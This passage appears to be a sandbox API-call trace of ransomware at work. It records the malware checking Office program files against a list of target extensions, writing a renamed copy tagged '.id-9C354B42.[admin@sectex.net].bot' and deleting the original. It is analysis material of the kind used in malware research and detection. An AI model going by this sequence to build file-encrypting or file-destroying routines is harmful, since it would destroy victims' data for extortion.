	[0156.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\cgmimp32.hlp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.666] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=31497) returned 1
	[0156.666] CloseHandle (hObject=0x3b0) returned 1
	[0156.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\cgmimp32.hlp")) returned 0x20
	[0156.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\cgmimp32.hlp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\cgmimp32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.666] lstrlenW (lpString=".doc") returned 4
	[0156.667] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1
	[0156.667] lstrlenW (lpString=".docx") returned 5
	[0156.667] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1
	[0156.667] lstrlenW (lpString=".pdf") returned 4
	[0156.667] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1
	[0156.667] lstrlenW (lpString=".xls") returned 4
	[0156.667] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1
	[0156.667] lstrlenW (lpString=".xlsx") returned 5
	[0156.667] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1
	[0156.667] lstrlenW (lpString=".ppt") returned 4
	[0156.667] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1
	[0156.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.667] lstrlenW (lpString=".zip") returned 4
	[0156.667] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1
	[0156.667] lstrlenW (lpString=".rar") returned 4
	[0156.667] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1
	[0156.667] lstrlenW (lpString=".bz2") returned 4
	[0156.667] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1
	[0156.667] lstrlenW (lpString=".7z") returned 3
	[0156.667] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1
	[0156.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.667] lstrlenW (lpString=".dbf") returned 4
	[0156.667] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1
	[0156.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.667] lstrlenW (lpString=".1cd") returned 4
	[0156.667] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1
	[0156.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.667] lstrlenW (lpString=".jpg") returned 4
	[0156.667] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1
	[0156.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.668] lstrlenW (lpString=".doc") returned 4
	[0156.668] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1
	[0156.668] lstrlenW (lpString=".docx") returned 5
	[0156.668] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1
	[0156.668] lstrlenW (lpString=".pdf") returned 4
	[0156.668] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1
	[0156.668] lstrlenW (lpString=".xls") returned 4
	[0156.668] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1
	[0156.668] lstrlenW (lpString=".xlsx") returned 5
	[0156.668] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1
	[0156.668] lstrlenW (lpString=".ppt") returned 4
	[0156.668] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1
	[0156.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.668] lstrlenW (lpString=".zip") returned 4
	[0156.668] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1
	[0156.668] lstrlenW (lpString=".rar") returned 4
	[0156.668] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1
	[0156.668] lstrlenW (lpString=".bz2") returned 4
	[0156.668] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1
	[0156.668] lstrlenW (lpString=".7z") returned 3
	[0156.668] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1
	[0156.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.668] lstrlenW (lpString=".dbf") returned 4
	[0156.668] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1
	[0156.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.668] lstrlenW (lpString=".1cd") returned 4
	[0156.668] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1
	[0156.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP") returned 55
	[0156.668] lstrlenW (lpString=".jpg") returned 4
	[0156.668] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1
	[0156.669] lstrcmpiW (lpString1=".chr", lpString2=".bot") returned 1
	[0156.669] lstrlenW (lpString="CharSetTable.chr") returned 16
	[0156.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr" (normalized: "c:\\program files\\microsoft office\\office14\\charsettable.chr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.670] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=56514) returned 1
	[0156.670] CloseHandle (hObject=0x3b0) returned 1
	[0156.670] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr" (normalized: "c:\\program files\\microsoft office\\office14\\charsettable.chr")) returned 0x20
	[0156.670] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\charsettable.chr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr" (normalized: "c:\\program files\\microsoft office\\office14\\charsettable.chr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.670] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.670] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\charsettable.chr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.671] GetLastError () returned 0x0
	[0156.671] ReadFile (in: hFile=0x3b0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xdcc2, lpOverlapped=0x0) returned 1
	[0156.675] WriteFile (in: hFile=0x3c0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xdcd0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xdcd0, lpOverlapped=0x0) returned 1
	[0156.677] ReadFile (in: hFile=0x3b0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.677] WriteFile (in: hFile=0x3c0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0156.677] SetEndOfFile (hFile=0x3c0) returned 1
	[0156.677] CloseHandle (hObject=0x3c0) returned 1
	[0156.677] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.677] SetEndOfFile (hFile=0x3b0) returned 1
	[0156.681] CloseHandle (hObject=0x3b0) returned 1
	[0156.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.681] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr" (normalized: "c:\\program files\\microsoft office\\office14\\charsettable.chr")) returned 1
	[0156.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.682] lstrlenW (lpString=".doc") returned 4
	[0156.682] lstrcmpiW (lpString1=".doc", lpString2=".chr") returned 1
	[0156.682] lstrlenW (lpString=".docx") returned 5
	[0156.682] lstrcmpiW (lpString1=".docx", lpString2="e.chr") returned -1
	[0156.682] lstrlenW (lpString=".pdf") returned 4
	[0156.682] lstrcmpiW (lpString1=".pdf", lpString2=".chr") returned 1
	[0156.682] lstrlenW (lpString=".xls") returned 4
	[0156.682] lstrcmpiW (lpString1=".xls", lpString2=".chr") returned 1
	[0156.682] lstrlenW (lpString=".xlsx") returned 5
	[0156.682] lstrcmpiW (lpString1=".xlsx", lpString2="e.chr") returned -1
	[0156.682] lstrlenW (lpString=".ppt") returned 4
	[0156.682] lstrcmpiW (lpString1=".ppt", lpString2=".chr") returned 1
	[0156.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.682] lstrlenW (lpString=".zip") returned 4
	[0156.682] lstrcmpiW (lpString1=".zip", lpString2=".chr") returned 1
	[0156.682] lstrlenW (lpString=".rar") returned 4
	[0156.682] lstrcmpiW (lpString1=".rar", lpString2=".chr") returned 1
	[0156.682] lstrlenW (lpString=".bz2") returned 4
	[0156.682] lstrcmpiW (lpString1=".bz2", lpString2=".chr") returned -1
	[0156.682] lstrlenW (lpString=".7z") returned 3
	[0156.682] lstrcmpiW (lpString1=".7z", lpString2="chr") returned -1
	[0156.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.682] lstrlenW (lpString=".dbf") returned 4
	[0156.682] lstrcmpiW (lpString1=".dbf", lpString2=".chr") returned 1
	[0156.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.682] lstrlenW (lpString=".1cd") returned 4
	[0156.682] lstrcmpiW (lpString1=".1cd", lpString2=".chr") returned -1
	[0156.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.682] lstrlenW (lpString=".jpg") returned 4
	[0156.682] lstrcmpiW (lpString1=".jpg", lpString2=".chr") returned 1
	[0156.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.683] lstrlenW (lpString=".doc") returned 4
	[0156.683] lstrcmpiW (lpString1=".doc", lpString2=".chr") returned 1
	[0156.683] lstrlenW (lpString=".docx") returned 5
	[0156.683] lstrcmpiW (lpString1=".docx", lpString2="e.chr") returned -1
	[0156.683] lstrlenW (lpString=".pdf") returned 4
	[0156.683] lstrcmpiW (lpString1=".pdf", lpString2=".chr") returned 1
	[0156.683] lstrlenW (lpString=".xls") returned 4
	[0156.683] lstrcmpiW (lpString1=".xls", lpString2=".chr") returned 1
	[0156.683] lstrlenW (lpString=".xlsx") returned 5
	[0156.683] lstrcmpiW (lpString1=".xlsx", lpString2="e.chr") returned -1
	[0156.683] lstrlenW (lpString=".ppt") returned 4
	[0156.683] lstrcmpiW (lpString1=".ppt", lpString2=".chr") returned 1
	[0156.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.683] lstrlenW (lpString=".zip") returned 4
	[0156.683] lstrcmpiW (lpString1=".zip", lpString2=".chr") returned 1
	[0156.683] lstrlenW (lpString=".rar") returned 4
	[0156.683] lstrcmpiW (lpString1=".rar", lpString2=".chr") returned 1
	[0156.683] lstrlenW (lpString=".bz2") returned 4
	[0156.683] lstrcmpiW (lpString1=".bz2", lpString2=".chr") returned -1
	[0156.683] lstrlenW (lpString=".7z") returned 3
	[0156.683] lstrcmpiW (lpString1=".7z", lpString2="chr") returned -1
	[0156.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.683] lstrlenW (lpString=".dbf") returned 4
	[0156.683] lstrcmpiW (lpString1=".dbf", lpString2=".chr") returned 1
	[0156.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.683] lstrlenW (lpString=".1cd") returned 4
	[0156.683] lstrcmpiW (lpString1=".1cd", lpString2=".chr") returned -1
	[0156.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr") returned 59
	[0156.683] lstrlenW (lpString=".jpg") returned 4
	[0156.683] lstrcmpiW (lpString1=".jpg", lpString2=".chr") returned 1
	[0156.684] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0156.684] lstrlenW (lpString="CLVIEW.EXE") returned 10
	[0156.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\clview.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.685] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=270200) returned 1
	[0156.685] CloseHandle (hObject=0x3b0) returned 1
	[0156.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\clview.exe")) returned 0x20
	[0156.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\clview.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\clview.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.686] lstrlenW (lpString=".doc") returned 4
	[0156.686] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0156.686] lstrlenW (lpString=".docx") returned 5
	[0156.686] lstrcmpiW (lpString1=".docx", lpString2="W.EXE") returned -1
	[0156.686] lstrlenW (lpString=".pdf") returned 4
	[0156.686] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0156.686] lstrlenW (lpString=".xls") returned 4
	[0156.686] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0156.686] lstrlenW (lpString=".xlsx") returned 5
	[0156.686] lstrcmpiW (lpString1=".xlsx", lpString2="W.EXE") returned -1
	[0156.686] lstrlenW (lpString=".ppt") returned 4
	[0156.686] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0156.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.686] lstrlenW (lpString=".zip") returned 4
	[0156.686] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0156.686] lstrlenW (lpString=".rar") returned 4
	[0156.686] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0156.686] lstrlenW (lpString=".bz2") returned 4
	[0156.686] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0156.686] lstrlenW (lpString=".7z") returned 3
	[0156.686] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0156.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.686] lstrlenW (lpString=".dbf") returned 4
	[0156.686] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0156.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.686] lstrlenW (lpString=".1cd") returned 4
	[0156.686] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0156.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.686] lstrlenW (lpString=".jpg") returned 4
	[0156.686] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0156.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.687] lstrlenW (lpString=".doc") returned 4
	[0156.687] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0156.687] lstrlenW (lpString=".docx") returned 5
	[0156.687] lstrcmpiW (lpString1=".docx", lpString2="W.EXE") returned -1
	[0156.687] lstrlenW (lpString=".pdf") returned 4
	[0156.687] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0156.687] lstrlenW (lpString=".xls") returned 4
	[0156.687] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0156.687] lstrlenW (lpString=".xlsx") returned 5
	[0156.687] lstrcmpiW (lpString1=".xlsx", lpString2="W.EXE") returned -1
	[0156.687] lstrlenW (lpString=".ppt") returned 4
	[0156.687] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0156.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.687] lstrlenW (lpString=".zip") returned 4
	[0156.687] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0156.687] lstrlenW (lpString=".rar") returned 4
	[0156.687] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0156.687] lstrlenW (lpString=".bz2") returned 4
	[0156.687] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0156.687] lstrlenW (lpString=".7z") returned 3
	[0156.687] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0156.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.687] lstrlenW (lpString=".dbf") returned 4
	[0156.687] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0156.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.687] lstrlenW (lpString=".1cd") returned 4
	[0156.687] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0156.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CLVIEW.EXE") returned 53
	[0156.687] lstrlenW (lpString=".jpg") returned 4
	[0156.687] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0156.688] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.688] lstrlenW (lpString="CMAX20.DLL") returned 10
	[0156.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\cmax20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0156.974] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=722296) returned 1
	[0156.974] CloseHandle (hObject=0x3e8) returned 1
	[0156.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\cmax20.dll")) returned 0x20
	[0156.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\cmax20.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\cmax20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0157.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.844] lstrlenW (lpString=".doc") returned 4
	[0157.844] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0157.844] lstrlenW (lpString=".docx") returned 5
	[0157.844] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1
	[0157.844] lstrlenW (lpString=".pdf") returned 4
	[0157.844] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0157.844] lstrlenW (lpString=".xls") returned 4
	[0157.844] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0157.844] lstrlenW (lpString=".xlsx") returned 5
	[0157.844] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1
	[0157.844] lstrlenW (lpString=".ppt") returned 4
	[0157.844] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0157.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.844] lstrlenW (lpString=".zip") returned 4
	[0157.844] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0157.844] lstrlenW (lpString=".rar") returned 4
	[0157.844] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0157.844] lstrlenW (lpString=".bz2") returned 4
	[0157.844] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0157.845] lstrlenW (lpString=".7z") returned 3
	[0157.845] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0157.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.845] lstrlenW (lpString=".dbf") returned 4
	[0157.845] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0157.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.845] lstrlenW (lpString=".1cd") returned 4
	[0157.845] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0157.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.845] lstrlenW (lpString=".jpg") returned 4
	[0157.845] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0157.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.845] lstrlenW (lpString=".doc") returned 4
	[0157.845] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0157.845] lstrlenW (lpString=".docx") returned 5
	[0157.845] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1
	[0157.845] lstrlenW (lpString=".pdf") returned 4
	[0157.845] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0157.845] lstrlenW (lpString=".xls") returned 4
	[0157.845] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0157.845] lstrlenW (lpString=".xlsx") returned 5
	[0157.845] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1
	[0157.845] lstrlenW (lpString=".ppt") returned 4
	[0157.845] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0157.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.845] lstrlenW (lpString=".zip") returned 4
	[0157.845] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0157.845] lstrlenW (lpString=".rar") returned 4
	[0157.845] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0157.846] lstrlenW (lpString=".bz2") returned 4
	[0157.846] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0157.846] lstrlenW (lpString=".7z") returned 3
	[0157.846] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0157.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.846] lstrlenW (lpString=".dbf") returned 4
	[0157.846] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0157.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.846] lstrlenW (lpString=".1cd") returned 4
	[0157.846] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0157.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CMAX20.DLL") returned 53
	[0157.846] lstrlenW (lpString=".jpg") returned 4
	[0157.846] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0157.846] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0157.846] lstrlenW (lpString="OLMAILR.FAE") returned 11
	[0157.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olmailr.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0157.847] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=10160) returned 1
	[0157.847] CloseHandle (hObject=0x3c4) returned 1
	[0157.847] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olmailr.fae")) returned 0x20
